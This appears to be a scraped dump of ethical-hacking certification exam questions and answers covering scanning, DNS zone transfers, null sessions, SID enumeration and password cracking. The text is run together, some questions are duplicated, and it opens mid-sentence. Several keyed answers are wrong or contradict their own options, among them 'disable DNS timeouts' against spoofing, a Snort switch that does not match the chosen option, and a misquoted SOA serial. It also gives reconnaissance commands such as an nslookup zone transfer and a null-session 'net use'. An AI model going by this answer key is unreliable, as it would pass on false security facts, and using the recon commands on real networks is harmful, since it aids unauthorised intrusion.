C. Helping you catch unexpected changes to a system utility file that might indicate that it had been replaced by a Trojan Horse. Tripwire generates a database of the most common files and directories on your system. Once it is generated, you can then check the current state of your system against the original database, and get a report of all the files that have been modified, added or deleted. This comes in handy if you allow other people access to your machine, and even if you don't, if someone does get access you'll know whether files such as /bin/login etc.
You have been charged with performing a number of security tests against a partner organizationin Australia. Your boss, who is in charge of your company and the partner company's ITdepartments, wants you to run tests just like an outside hacker would against their network. Healso wants you to perform all of your tests without tipping off the IT department at the partnercompany. You have no knowledge of the partner company's systems other than their name andtheir external website. You decide to perform some passive scanning so as not to tip off anyone atthe partner company.?What would be considered passive scanning?A. FirewalkingB. WhoisC. NetcraftD. Friendly Pinger
B. WhoisC. Netcraft
Jack is conducting a port scan of a target network. He knows that his target network has a webserver and that a mail server is up and running. Jack has been sweeping the network but has notbeen able to get any responses from the remote target. Check all of the following that could be alikely cause of the lack of response?A. The destination network might be downB. The packet TTL value is too low and cannot reach the targetC. The host might be downD. UDP is filtered by a gatewayE. The TCP window size does not matchF. ICMP is filtered by a gateway
A. The destination network might be downB. The packet TTL value is too low and cannot reach the targetC. The host might be downF. ICMP is filtered by a gatewayIf the destination host or the destination network is down, there will be no way to get an answer, and if TTL is set too low, the UDP packets will "die" before reaching the host because of too many hops between the scanning computer and the target. The TCP receive window size is the amount of received data (in bytes) that can be buffered during a connection. The sending host can send only that amount of data before it must wait for an acknowledgment and window update from the receiving host. ICMP is used mainly for echo requests and not in port scans.
A Hacker would typically use a botnet to send a large number of queries to open DNS servers.These queries will be "spoofed" to look like they come from the target of the flooding, and the DNSserver will reply to that network address.It is generally possible to stop the more-common bot-delivered attack by blocking traffic from theattacking machines, which are identifiable. But blocking queries from DNS servers bringsproblems in its wake. A DNS server has a valid role to play in the workings of the Internet.Blocking traffic to a DNS server could also mean blocking legitimate users from sending e-mail orvisiting a Web site. A single DNS query could trigger a response that is as much as 73 times larger than the request. A. DNS reflector and amplification attackB. DNS cache poisoning attacksC. DNS forward lookup attacksD. DNS reverse connection attacks.
A. DNS reflector and amplification attacks.
An employee wants to bypass detection by a network-based IDS application and does not want to attack the system containing the IDS application. Which of the following strategies can the employee use to evade detection by a network-based IDS application?A. Create a ping floodB. Create multiple false positivesC. Create a covert network tunnelD. Create a SYN flood
C. Create a covert network tunnel.HTTP tunneling is a technique by which communications performed using various network protocols are encapsulated using the HTTP protocol, the network protocols in question usually belonging to the TCP/IP family of protocols. The HTTP protocol therefore acts as a wrapper for a covert channel that the network protocol being tunneled uses to communicate. The HTTP stream with its covert channel is termed a HTTP tunnel. Very few firewalls block outgoing HTTP traffic.
A majority of attacks come from insiders, people who have direct access to a company's computersystem as part of their job function or a business relationship. Who is considered an insider?A. A government agency since they know the company's computer system strengths andweaknessesB. A competitor to the company because they can directly benefit from the publicity generated bymaking such an attackC. The CEO of the company because he has access to all of the computer systemsD. Disgruntled employee, customers, suppliers, vendors, business partners, contractors, temps,and consultants
D. Disgruntled employees, customer, suppliers, vendors, business partners, contractors, temps, and consultants. An insider is anyone who has a foot in the door one way or another.
Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2006-09-25 00:01 ESTHost 192.168.0.0 seems to be a subnet broadcast address (returned 4 extra pings).Host 192.168.0.1 appears to be up.MAC Address: 00:12:17:31:4F:C4 (Cisco-Linksys)Host 192.168.0.6 appears to be up.MAC Address: 00:C0:4F:A1:25:4A (Dell Computer)Host 192.168.0.10 appears to be up.MAC Address: 00:B0:D0:FE:87:68 (Dell Computer)Host 192.168.0.13 appears to be up.MAC Address: 00:C0:4F:A1:25:89 (Dell Computer)Host 192.168.0.100 appears to be up.MAC Address: 00:C0:4F:A1:27:BF (Dell Computer)Host 192.168.0.103 appears to be up.MAC Address: 00:0D:88:66:FB:87 (D-Link)Host 192.168.0.104 appears to be up.Host 192.168.0.108 appears to be up.MAC Address: 00:11:D8:90:D6:7F (Asustek Computer)Host 192.168.0.255 seems to be a subnet broadcast address (returned 4 extrapings).Nmap run completed -- 256 IP addresses (8 hosts up) scanned in 4.390 secondsWhich of the following nmap commands in Linux produces the above output?A. run nmap -TX 192.168.0.1/24B. sudo nmap -sP 192.168.0.1/24C. root nmap -sA 192.168.0.1/24D. launch nmap -PP 192.168.0.1/24
B. sudo nmap -sP 192.168.0.1/24
Peter extracts the SID list from Windows 2000 Server machine using the hacking tool"SIDExtracter". Here is the output of the SIDs:S-1-5-21-1125394485-807628933-549785860-100 John-1-5-21-1125394485-807628933-549785860-652 Rebecca-1-5-21-1125394485-807628933-549785860-412 Sheela-1-5-21-1125394485-807628933-549785860-999 Shawn-1-5-21-1125394485-807628933-549785860-777 Somia-1-5-21-1125394485-807628933-549785860-500 Chang-1-5-21-1125394485-807628933-549785860-555 MicahFrom the above list identify the user account with System Administrator privileges?A. SheelaB. ShawnC. ChangD. SomiaE. RebeccaF. JohnG. Micah
C. ChangThe SID of the built-in administrator will always follow this example: S-1-5-domain-500
Jack is conducting a port scan of a target network. He knows that his target network has a webserver and that a mail server is up and running. Jack has been sweeping the network but has notbeen able to get any responses from the remote target. Check all of the following that could be alikely cause of the lack of response?A. ICMP is filtered by a gatewayB. The host might be downC. The TCP window size does not matchD. The destination network might be downE. UDP is filtered by a gatewayF. The packet TTL value is too low and cannot reach the target
A. ICMP is filtered by a gatewayB. The host might be downD. The destination network might be downF. The packet TTL value is too low and cannot reach the target
Which of the following would be the best reason for sending a single SMTP message to anaddress that does not exist within the target company?A. To gather information about internal hosts used in email treatmentB. To verify information about the Mail administratorC. To gather information about procedure in place to deal with such messagesD. To create a denial of service attack
A. To gather information about internal hosts used in e-mail treatment. The replay from the email server that states that there is no such recipient will also give you some information about the name of the e-mail server, versions used and so on.
What is the essential difference between an 'Ethical Hacker' and a 'Cracker'?A. The ethical hacker does not use the same techniques or skills as a cracker.B. The ethical hacker does it strictly for financial motives unlike a cracker.C. The ethical hacker has authorization from the owner of the target.D. The ethical hacker is just a cracker who is getting paid.
C. The ethical hacker has authorization from the owner of the target.
What does the term "Ethical Hacking" mean?A. Someone who is hacking for ethical reasons.B. Someone who is using his/her skills for ethical reasons.C. Someone who is using his/her skills for defensive purposes.D. Someone who is using his/her skills for offensive purposes.
C. Someone who is using his/her skills for defensive purposes.
Who is an Ethical Hacker?A. A person whohacksfor ethical reasonsB. A person whohacksfor an ethical causeC. A person who hacks for defensive purposesD. A person whohacksfor offensive purposes
C. A person who hacks for defensive purposes.
Where should a security tester be looking for information that could be used by an attacker againstan organization? (Select all that apply)A. CHAT roomsB. WHOIS databaseC. News groupsD. Web sitesE. Search enginesF. Organization's own web site
A. CHAT roomsB. WHOIS databaseC. News groupsD. Web sitesE. Search enginesF. Organization's own web site
What are the two basic types of attacks? (Choose two.)A. DoSB. PassiveC. SniffingD. ActiveE. Cracking
B. PassiveD. Active
You are footprinting Acme.com to gather competitive intelligence. You visit the acme.com websitefor contact information and telephone number numbers but do not find it listed there. You knowthat they had the entire staff directory listed on their website 12 months ago but now it is not there.How would it be possible for you to retrieve information from the website that is outdated?A. Visit google search engine and view the cached copy.B. Visit Archive.org site to retrieve the Internet archive of the acme website.C. Crawl the entire website and store them into your computer.D. Visit the company's partners andcustomers website for this information.
B. Visit Archive.org site to retrive the Internet archive of the Acme website.
Under which Federal Statutes does FBI investigate for computer crimes involving e-mail scams andmail fraud?A. 18 U.S.C 1029 Possession of Access DevicesB. 18 U.S.C 1030 Fraud and related activity in connection with computersC. 18 U.S.C 1343 Fraud by wire, radio or televisionD. 18 U.S.C 1361 Injury to Government PropertyE. 18 U.S.C 1362 Government communication systemsF. 18 U.S.C 1831 Economic Espionage ActG. 18 U.S.C 1832 Trade Secrets Act
B. 18-USC0-1030 Fraud and related activity in connection with computers.
Which one of the following is defined as the process of distributing incorrect Internet Protocol (IP)addresses/names with the intent of diverting traffic?A. Network aliasingB. Domain Name Server (DNS) poisoningC. Reverse Address Resolution Protocol (ARP)D. Port scanning
B. DNS Poisoning.
You are footprinting an organization to gather competitive intelligence. You visit the company'swebsite for contact information and telephone numbers but do not find it listed there. You knowthat they had the entire staff directory listed on their website 12 months ago but not it is not there.How would it be possible for you to retrieve information from the website that is outdated?A. Visit google's search engine and view the cached copy.B. Visit Archive.org web site to retrieve the Internet archive of the company's website.C. Crawl the entire website and store them into your computer.D. Visit the company's partners andcustomers website for this information.
B. Visit Archive.org to retrieve the Internet archive of the company's website.
A pass4sure security System Administrator is reviewing the network system log files. He notes thefollowing: -Network log files are at 5 MB at 12:00 noon. - At 14:00 hours, the log files at 3 MB. What should he assume has happened and what should he do about the situation?A. He should contact the attacker's ISP as soon as possible and have the connection disconnected.B. He should log the event as suspicious activity, continue to investigate, and take further steps according to site security policy.C. He should log the file size, and archive the information, because the router crashed.D. He should run a file system check, because the Syslog server has a self correcting file system problem.E. He should disconnect from the Internet discontinue any further unauthorized use, because an attack has taken place.
B. He should log the event as suspicious activity, continue to investigate and take further steps according to site security policy.
To what does "message repudiation" refer to what concept in the realm of email security?A. Message repudiation means a user can validate which mail server or servers a message was passed through.B. Message repudiation means a user can claim damages for a mail message that damaged their reputation.C. Message repudiation means a recipient can be sure that a message was sent from a particular person.D. Message repudiation means a recipient can be sure that a message was sent from a certain host.E. Message repudiation means a sender can claim they did not actually send a particular message.
E. Message repudiation means a sender can claim that they did not actually send a particular message.
Snort has been used to capture packets on the network. On studying the packets, the penetration tester finds it to be abnormal. If you were the penetration tester, why would you find thisabnormal? (Note: The student is being tested on concept learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dumo.)What is odd about this attack? (Choose the most appropriate statement)A. This is not a spoofed packet as the IP stack has increasing numbers for the three flags.B. This is back orifice activity as the scan comes from port 31337.C. The attacker wants to avoid creating a sub-carrier connection that is not normally valid.D. There packets were created by a tool; they were not created by a standard IP stack.
B. This is back orifice activity as the scan comes from port 31337
A very useful resource for passively gathering information about a target company is:A. Host scanningB. Whois searchC. TracerouteD. Ping sweep
B. Whois search.
You receive an email with the following message: Hello Steve, We are having technical difficulty inrestoring user database record after the recent blackout. Your account data is corrupted. Please logon to the SuperEmailServices.com and change your password.http://www.supermailservices.com@0xde.0xad.0xbe.0xef/support/logon.htmIf you do not reset your password within 7 days, your account will be permanently disabled locking you out from our e-mail services. Sincerely, Technical Support SuperEmailServices From this email you suspect that this message was sent by some hacker since you have been using their email services for the last 2 years and they have never sent out an e-mail such as this. You also observe the URL in the message and confirm your suspicion about 0xde.0xad.0xbde.0xef whichlooks like hexadecimal numbers. You immediately enter the following at Windows 2000 commandprompt: Ping0xde.0xad.0xbe.0xef You get a response with a valid IP address. What is theobstructed IP address in the e-mail URL?A. 222.173.190.239B. 233.34.45.64C. 54.23.56.55D. 199.223.23.45
A. 222.173.190.239
Which of the following tools are used for footprinting?(Choose four.)A. Sam SpadeB. NSLookupC. TracerouteD. NeotraceE. Cheops
A. Sam SpadeB. NSLookupC. TracerouteD. Neotrace
According to the CEH methodology, what is the next step to be performed after footprinting?A. EnumerationB. ScanningC. System HackingD. Social EngineeringE. Expanding Influence
B. Scanning
NSLookup is a good tool to use to gain additional information about a target network. What doesthe following command accomplish? nslookup > server > set type =any > ls -dA. Enables DNS spoofingB. Loads bogus entries into the DNS tableC. Verifies zone securityD. Performs a zone transferE. Resets the DNS cache
D. Performs a zone transfer
While footprinting a network, what port/service should you look for to attempt a zone transfer?A. 53 UDPB. 53 TCPC. 25 UDPD. 25 TCPE. 161 UDPF. 22 TCPG. 60 TCP
B. 53 TCP
Your lab partner is trying to find out more information about a competitors web site. The site has a.com extension. She has decided to use some online whois tools and look in one of the regionalInternet registrys. Which one would you suggest she looks in first?A. LACNICB. ARINC. APNICD. RIPEE. AfriNIC
B. ARIN
Network Administrator Patricia is doing an audit of the network. Below are some of her findings concerning DNS. Which of these would be a cause for alarm? Select the best answer.A. There are two external DNS Servers for Internet domains. Both are AD integrated.B. All external DNS is done by an ISP.C. Internal AD Integrated DNS servers are using private DNS names that are unregistered.D. Private IP addresses are used on the internal network and are registered with the internal AD integrated DNS server.
A. There are two external DNS Servers for Internet domains. Both are AD integrated
Exhibit Joe Hacker runs the hping2 hacking tool to predict the target host's sequence numbers in one of the hacking session. What does the first and second column mean? Select two.A. The first column reports the sequence numberB. The second column reports the difference between the current and last sequence numberC. The second column reports the next sequence numberD. The first column reports the difference between current and last sequence number
A. The first column reports the sequence numberB. The second column reports the difference between the current and last sequence number
While performing a ping sweep of a subnet you receive an ICMP reply of Code 3/Type 13 for allthe pings sent out. What is the most likely cause behind this response?A. The firewall is dropping the packets.B. An in-line IDS is dropping the packets.C. A router is blocking ICMP.D. The host does not respond to ICMP packets.
C. A router is blocking ICMP
The following excerpt is taken from a honeyput log. The log captures activities across three days.There are several intrusion attempts; however, a few are successful. Study the log given below and answer the following question: (Note: The objective of this questions is to test whether thestudent has learnt about passive OS fingerprinting (which should tell them the OS from logcaptures): can they tell a SQL injection attack signature;can they infer if a user ID has been created by an attacker and whether they can read plain source - destination entries from log entries.) What can you infer from the above log?A. The system has been compromised and backdoored by the attacker.B. The actual IP of the successful attacker is 24.9.255.53.
A. The system has been compromised and backdoored by the attacker.
War dialing is a very old attack and depicted in movies that were made years ago. Why would amodem security tester consider using such an old technique?A. It is cool, and if it works in the movies it must work in real life.B. It allows circumvention of protection mechanisms by being on the internal network.C. It allows circumvention of the company PBX.D. A good security tester would not use such a derelict technique.
B. It allows circumvention of protection mechanisms by being on the internal network.
What are twp types of ICMP code used when using the ping command?A. It uses types 0 and 8.B. It uses types 13 and 14.C. It uses types 15 and 17.D. The ping command does not use ICMP but uses UDP.
A. It uses types 0 and 8.
An Nmap scan shows the following open ports, and nmap also reports that the OS guessingresults to match too many signatures hence it cannot reliably beidentified: 21 ftp 23 telnet 80 http443https What does this suggest ?A. This is a Windows Domain ControllerB. The host is not firewalledC. The host is not a Linux or Solaris systemD. The host is not properly patched
D. The host is not properly patched.
What port scanning method involves sending spoofed packets to a target system and then lookingfor adjustments to the IPID on a zombie system?A. Blind Port ScanningB. Idle ScanningC. Bounce ScanningD. Stealth ScanningE. UDP Scanning
B. Idle scanning.
What port scanning method is the most reliable but also the most detectable?A. Null ScanningB. Connect ScanningC. ICMP ScanningD. Idlescan ScanningE. Half ScanningF. Verbose Scanning
B. Connect scanning
What does an ICMP (Code 13) message normally indicates?A. It indicates that the destination host is unreachableB. It indicates to the host that the datagram which triggered the source quench message will needto be re-sentC. It indicates that the packet has been administratively dropped in transitD. It is a request to the host to cut back the rate at which it is sending traffic to the Internetdestination
C. It indicates that the packet has been administratively dropped in transit.
Because UDP is a connectionless protocol: (Select 2)A. UDPrecvfrom() and write() scanning will yield reliable resultsB. It can only be used for Connect scansC. It can only be used for SYN scansD. There is no guarantee that the UDP packets will arrive at their destinationE. ICMP port unreachable messages may not be returned successfully
D. There is no guarantee that the UDP packets will arrive at their destinationE. ICMP port unreachable messages may not be returned successfully.
What ICMP message types are used by the ping command?A. Timestamp request (13) and timestamp reply (14)B. Echo request (8) and Echo reply (0)C. Echo request (0) and Echo reply (1)D. Ping request (1) and Ping reply (2)
B. Echo request (8) and Echo reply (0)
Which of the following systems would not respond correctly to an nmap XMAS scan?A. Windows 2000 Server running IIS 5B. Any Solaris version running SAMBA ServerC. Any version of IRIXD. RedHat Linux 8.0 running Apache Web Server
A. Windows 2000 Server running IIS 5
home/root # traceroute www.targetcorp.com traceroute to www.targetcorp.com (192.168.12.18),64 hops may, 40 byte packets 1 router.anon.com (192.13.212.254) 1.373 ms 1.123 ms 1.280 ms 2192.13.133.121 (192.13.133.121) 3.680 ms 3.506 ms 4.583 ms 3 firewall.anon.com(192.13.192.17) 127.189 ms 257.404 ms 208.484 ms 4 anon-gw.anon.com (192.93.144.89) 471.68 ms 376.875 ms 228.286 ms 5 fe5-0.lin.isp.com(192.162.231.225) 2.961 ms 3.852 ms 2.974 ms 6 fe0-0.lon0.isp.com (192.162.231.234) 3.979 ms3.243 ms 4.370 ms 7 192.13.133.5 (192.13.133.5) 11.454 ms 4.221 ms 3.333 ms 6 * * * 7 * * * 8www.targetcorp.com (192.168.12.18) 5.392 ms 3.348 ms 3.199 msUse the tracerroute results shown above to answer the following question: The perimeter security at targetcorp.com does not permit ICMP-TTL-expired packets out.
A. True
When Nmap performs a ping sweep, which of the following sets of requests does it send to thetarget device?A. ICMP ECHO_REQUEST & TCP SYNB. ICMP ECHO_REQUEST & TCP ACKC. ICMP ECHO_REPLY & TFP RSTD. ICMP ECHO_REPLY & TCP FIN
B. ICMP ECHO_REQUEST & TCP ACK
_______ is one of the programs used to wardial.A. DialITB. NetstumblerC. TooPacD. KismetE. ToneLoc
E. ToneLoc
What are the default passwords used by SNMP? (Choose two.)A. PasswordB. SAC. PrivateD. AdministratorE. PublicF. Blank
C. PrivateE. Public.
Which of the following ICMP message types are used for destinations unreachables?A. 0B. 3C. 11D. 13E. 17
B. 3
What is the proper response for a FIN scan if the port is closed?A. SYNB. ACKC. FIND. PSHE. RST
E. RST
What is the proper response for a FIN scan if the port is open?A. SYNB. ACKC. FIND. PSHE. RSTF. No response
F. No response.
What is the proper response for a X-MAS scan if the port is closed?A. SYNB. ACKC. FIND. PSHE. RSTF. No response
E. RST
What is the proper response for a X-MAS scan if the port is open?A. SYNB. ACKC. FIND. PSHE. RSTF. No response
F. No response
What flags are set in a X-MAS scan? (Choose all that apply.)A. SYNB. ACKC. FIND. PSHE. RSTF. URG
C. FIND. PSHF. URG
Which of the following is an automated vulnerability assessment tool.A. Whack a MoleB. NmapC. NessusD. KismetE. Jill32
C. Nessus
What is the disadvantage of an automated vulnerability assessment tool?A. IneffectiveB. SlowC. Prone to false positivesD. Prone to false negativesE. Noisy
E. Noisy
What are two things that are possible when scanning UDP ports? (Choose two.)A. A reset will be returnedB. An ICMP message will be returnedC. The four-way handshake will not be completedD. An RFC 1294 message will be returnedE. Nothing
B. An ICMP message will be returnedE. Nothing.
What does a type 3 code 13 represent? (Choose two.)A. Echo requestB. Destination unreachableC. Network unreachableD. Administratively prohibitedE. Port unreachableF. Time exceeded
B. Destination unreachableD. Administratively prohibited
Destination unreachable administratively prohibited messages can inform the hacker to what?A. That a circuit level proxy has been installed and is filtering trafficB. That his/her scans are being blocked by a honeypot or jailC. That the packets are being malformed by the scanning softwareD. That a router or other packet-filtering device is blocking trafficE. That the network is functioning normally
D. That a router or other packet filtering device is blocking traffic.
Which of the following Nmap commands would be used to perform a stack fingerprinting?A. Nmap -O -p80B. Nmap -hU -QC. Nmap -sT -pD. Nmap -u -o -w2E. Nmap -sS -0p target
A. Nmap -O -p80
Name two software tools used for OS guessing. (Choose two.)A. NmapB. SnadboyC. QuesoD. UserInfoE. NetBus
A. NmapC. Queso
Sandra is the security administrator of pass4sure.com. One day she notices that thepass4sure.com Oracle database server has been compromised and customer information alongwith financial data has been stolen. The financial loss will be estimated in millions of dollars if thedatabase gets into the hands of competitors. Sandra wants to report this crime to the lawenforcement agencies immediately. Which organization coordinates computer crime investigationsthroughout the United States?A. NDCAB. NICPC. CIRPD. NPCE. CIA
D. NPC
Which of the following Nmap commands would be used to perform a UDP scan of the lower 1024ports?A. Nmap -h -UB. Nmap -hUC. Nmap -sU -p 1-1024D. Nmap -u -v -w2 1-1024E. Nmap -sS -O target/1024
C. Nmap -sU -p 1-1024
Which of the following commands runs snort in packet logger mode?A. ./snort -dev -h ./logB. ./snort -dev -l ./logC. ./snort -dev -o ./logD. ./snort -dev -p ./log
B. ./snort - dev -h ./log
Which of the following command line switch would you use for OS detection in Nmap?A. -DB. -OC. -PD. -X
B. -O
Which Type of scan sends a packets with no flags set? Select the AnswerA. Open ScanB. Null ScanC. Xmas ScanD. Half-Open Scan
B. Null Scan
Jess the hacker runs L0phtCrack's built-in sniffer utility which grabs SMB password hashes andstores them for offline cracking. Once cracked, these passwords can provide easy access towhatever network resources the user account has access to. But Jess is not picking up hashedfrom the network. Why?A. The network protocol is configured to use SMB Signing.B. The physical network wire is on fibre optic cable.C. The network protocol is configured to use IPSEC.D. L0phtCrack SMB filtering only works through Switches and not Hubs.
A. The network protocol is configured to use SMB Signing.
Which address translation scheme would allow a single public IP address to always correspond toa single machine on an internal network, allowing "server publishing"?A. Overloading Port Address TranslationB. Dynamic Port Address TranslationC. Dynamic Network Address TranslationD. Static Network Address Translation
D. Static Network Address Translation
What is the following command used for? net use \targetipc$ "" /u:""A. Grabbing the etc/passwd fileB. Grabbing the SAMC. Connecting to a Linux computer through Samba.D. This command is used to connect as a null sessionE. Enumeration of Cisco routers
D. This command is used to connect as a null session.
What is the proper response for a NULL scan if the port is closed?A. SYNB. ACKC. FIND. PSHE. RSTF. No response
E. RST
One of your team members has asked you to analyze the following SOA record. What is the TTL?Rutgers.edu. SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400.
D. 2400
One of your team members has asked you to analyze the following SOA record. What is theversion? Rutgers. edu.SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 6048002400.A. 200303028B. 3600C. 604800D. 2400E. 60F. 4800
A. 200303028
MX record priority increases as the number increases. (True/False.)A. TrueB. False
B. False
Which of the following tools can be used to perform a zone transfer?A. NSLookupB. FingerC. DigD. Sam SpadeE. HostF. NetcatG. Neotrace
A. NSLookupC. DigD. Sam SpadeE. Host
Under what conditions does a secondary name server request a zone transfer from a primaryname server?A. When a primary SOA is higher that a secondary SOAB. When a secondary SOA is higher that a primary SOAC. When a primary name server has had its service restartedD. When a secondary name server has had its service restartedE. When the TTL falls to zero
A. When a primary SOA is higher than a secondary SOA.
What ports should be blocked on the firewall to prevent NetBIOS traffic from not coming throughthe firewall if your network is comprised of Windows NT, 2000, and XP? (Choose all that apply.)A. 110B. 135C. 139D. 161E. 445F. 1024
B. 135C. 139E. 445
What is a NULL scan?A. A scan in which all flags are turned offB. A scan in which certain flags are offC. A scan in which all flags are onD. A scan in which the packet size is set to zeroE. A scan witha illegal packet size
A. A scan in which all flags are turned off.
What is the proper response for a NULL scan if the port is open?A. SYNB. ACKC. FIND. PSHE. RSTF. No response
F. No response.
Which of the following statements about a zone transfer correct? (Choose three.)A. A zone transfer is accomplished with the DNSB. A zone transfer is accomplished with the nslookup serviceC. A zone transfer passes all zone information that a DNS server maintainsD. A zone transfer passes all zone information thata nslookup server maintainsE. A zone transfer can be prevented by blocking all inbound TCP port 53 connectionsF. Zone transfers cannot occur on the Internet
A. A zone transfer is accomplished with the DNSC. A zone transfer passes all zone information that a DNS server maintainsE. A zone transfer can be prevented by blocking all inbound TCP port 53 connections.
You have the SOA presented below in your Zone. Your secondary servers have not been able tocontact your primary server to synchronize information. How long will the secondary serversattempt to contact the primary server before it considers that zone is dead and stops responding toqueries? collegae.edu.SOA,cikkye.edu ipad.college.edu. (200302028 3600 3600 604800 3600)A. One dayB. One hourC. One weekD. One month
C. One week.
Tess King is using the nslookup command to craft queries to list all DNS information (such asName Servers, host names, MX records, CNAME records, glue records (delegation for childDomains), zone serial number, TimeToLive (TTL) records, etc) for a Domain. What do you thinkTess King is trying to accomplish? Select the best answer.A. A zone harvestingB. A zone transferC. A zone updateD. A zone estimate
B. A zone transfer
A zone file consists of which of the following Resource Records (RRs)?A. DNS, NS, AXFR, and MX recordsB. DNS, NS, PTR, and MX recordsC. SOA, NS, AXFR, and MX recordsD. SOA, NS, A, and MX records
D. SOA, NS, A and MX records
Let's imagine three companies (A, B and C), all competing in a challenging global environment.Company A and B are working together in developing a product that will generate a majorcompetitive advantage for them. Company A has a secure DNS server while company B has aDNS server vulnerable to spoofing. With a spoofing attack on the DNS server of company B,company C gains access to outgoing e-mails from companyHow do you prevent DNS spoofing? (Select the Best Answer.)A. Install DNS logger and track vulnerable packetsB. Install DNS Anti-spoofingC. Disable DNS timeoutsD. Disable DNS Zone Transfer
C. Disable DNS timeouts.
Which DNS resource record can indicate how long any "DNS poisoning" could last?A. MXB. SOAC. NSD. TIMEOUT
B. SOA
Which of the following tools are used for enumeration?A. SolarWindsB. USER2SIDC. CheopsD. SID2USERE. DumpSec
B. User2SidD. Sid2UserE. DumpSec
Susan has attached to her company's network. She has managed to synchronize her boss's sessions with that of the file server. She then intercepted his traffic destined for the server, changed it the way she wanted to and then placed it on the server in his home directory. What kind of attack is Susan carrying on?A. A sniffing attackB. A spoofing attackC. A man in the middle attackD. A denial of service attack
C. A man in the middle attack.
What does FIN in TCP flag define?A. Used to close a TCP connectionB. Used to abort a TCP connection abruptlyC. Used to indicate the beginning of a TCP connectionD. Used to acknowledge receipt of a previous packet or transmission
A. Used to close a TCP connection.
What sequence of packets is sent during the initial TCP three-way handshake?A. SYN, URG, ACKB. FIN, FIN-ACK, ACKC. SYN, ACK, SYN-ACKD. SYN, SYN-ACK, ACK
D. SYN, SYN-ACK, ACK
As a securing consultant, what are some of the things you would recommend to a company toensure DNS security? Select the best answers.A. Use the same machines for DNS and other applicationsB. Harden DNS serversC. Use split-horizon operation for DNS serversD. Restrict Zone transfersE. Have subnet diversity between DNS servers
B. Harden DNS serversC. Use split-horizon operation for DNS serversD. Restrict Zone transfersE. Have subnet diversity between DNS servers
Vulnerability mapping occurs after which phase of a penetration test?A. Host scanningB. Passive information gatheringC. Analysis of host scanningD. Network level discovery
C. Analysis of host scanning.
What tool can crack Windows SMB passwords simply by listening to network traffic? Select thebest answer.A. This is not possibleB. NetbusC. NTFSDOSD. L0phtcrack
D. L0phtcrack
Vulnerability mapping occurs after which phase of a penetration test?A. Host scanningB. Passive information gatheringC. Analysis of host scanningD. Network level discovery
C. Analysis of host scanning
A network admin contacts you. He is concerned that ARP spoofing or poisoning might occur on his network. What are some things he can do to prevent it? Select the best answers.A. Use port security on his switches.B. Use a tool like ARPwatch to monitor for strange ARP activity.C. Use a firewall between all LAN segments.D. If you have a small network, use static ARP entries.E. Use only static IP addresses on all PC's.
A. Use port security on his switches.B. Use a tool like ARPwatch to monitor for strange ARP activity.D. If you have a small network, use static ARP entries
Peter, a Network Administrator, has come to you looking for advice on a tool that would help himperform SNMP enquires over the network. Which of these tools would do the SNMP enumerationhe is looking for? Select the best answers.A. SNMPUtilB. SNScanC. SNMPScanD. Solarwinds IP Network BrowserE. NMap
A. SNMPUtilB. SNScanD. Solarwinds IP Network Browser
If a token and 4-digit personal identification number (PIN) are used to access a computer systemand the token performs off-line checking for the correct PIN, what type of attack is possible?A. BirthdayB. Brute forceC. Man-in-the-middleD. Smurf
B. Brute force
Which of the following algorithms can be used to guarantee the integrity of messages being sent,in transit, or stored? (Choose the best answer)A. symmetric algorithmsB. asymmetric algorithmsC. hashing algorithmsD. integrity algorithms
C. Hashing algorithms
You are attempting to crack LM Manager hashed from Windows 2000 SAM file. You will be usingLM Brute force hacking tool for decryption. What encryption algorithm will you be decrypting?A. MD4B. DESC. SHAD. SSL
B. DES
In the context of password security, a simple dictionary attack involves loading a dictionary file (a text file full of dictionary words) into a cracking application such as L0phtCrack or John the Ripper,and running it against user accounts located by the application. The larger the word and word fragment selection, the more effective the dictionary attack is. The brute force method is the most inclusive, although slow. It usually tries every possible letter and number combination in its automated exploration. If you would use both brute force and dictionary methods combined together to have variation of words, what would you call such an attack?
C. Hybrid
What is the algorithm used by LM for Windows2000 SAM?A. MD4B. DESC. SHAD. SSL
B. DES
Which of the following is the primary objective of a rootkit?A. It opens a port to provide an unauthorized serviceB. It creates a buffer overflowC. It replaces legitimate programsD. It provides an undocumented opening in a program
C. It replaces legitimate programs.
This kind of password cracking method uses word lists in combination with numbers and specialcharacters:A. HybridB. LinearC. SymmetricD. Brute Force
A. Hybrid
_________ is a tool that can hide processes from the process list, can hide files, registry entries, and intercept keystrokes.A. TrojanB. RootKitC. DoS toolD. ScannerE. Backdoor
B. Rootkit
What is the BEST alternative if you discover that a rootkit has been installed on one of your computers?A. Copy the system files from a known good systemB. Perform a trap and traceC. Delete the files and try to determine the sourceD. Reload from a previous backupE. Reload from known good media
E. Reload from known good media.
What do Trinoo, TFN2k, WinTrinoo, T-Sight, and Stracheldraht have in common?A. All are hacking tools developed by the legion of doomB. All are tools that can be used not only by hackers, but also security personnelC. All are DDOS toolsD. All are tools that are only effective against WindowsE. All are tools that are only effective against Linux
C. All are DDoS tools.
How can you determine if an LM hash you extracted contains a password that is less than 8characters long?A. There is no way to tell because a hash cannot be reversedB. The right most portion of the hash is always the sameC. The hash always starts with AB923DD. The left most portion of the hash is always the sameE. A portion of the hash will be all 0's
B. The right-most portion of the hash is always the same.
When discussing passwords, what is considered a brute force attack?A. You attempt every single possibility until you exhaust all possible combinations or discover thepasswordB. You threaten to use the rubber hose on someone unless they reveal their passwordC. You load a dictionary of words into your cracking programD. You create hashes of a large number of words and compare it with the encrypted passwordsE. You wait until the password expires
A. You attempt every single possibility until you exhaust all possible combinations or discover the password.
Which of the following are well know password-cracking programs? (Choose all that apply.)A. L0phtcrackB. NetCatC. Jack the RipperD. NetbusE. John the Ripper
A. L0phtcrackE. John the Ripper
Password cracking programs reverse the hashing process to recover passwords. (True/False.)A. TrueB. False
B. False
What is GINA?A. Gateway Interface Network ApplicationB. GUI Installed Network Application CLASSC. Global Internet National Authority (G-USA)D. Graphical Identification and Authentication DLL
D. Graphical Identification adn Authentication DLL.
Why would you consider sending an email to an address that you know does not exist within thecompany you are performing a Penetration Test for?A. To determine who is the holder of the root accountB. To perform a DoSC. To create needless SPAMD. To illicit a response back that will reveal information about email servers and how they treatundeliverable mailE. To test for virus protection
D. To elicit a response that will reveal information about e-mail servers and how they treat undeliverable mail.
You are a Administrator of Windows server. You want to find the port number for POP3. What filewould you find the information in and where? Select the best answer.A. %windir%\\etc\\servicesB. system32\\drivers\\etc\\servicesC. %windir%\\system32\\drivers\\etc\\servicesD. /etc/servicesE. %windir%/system32/drivers/etc/services
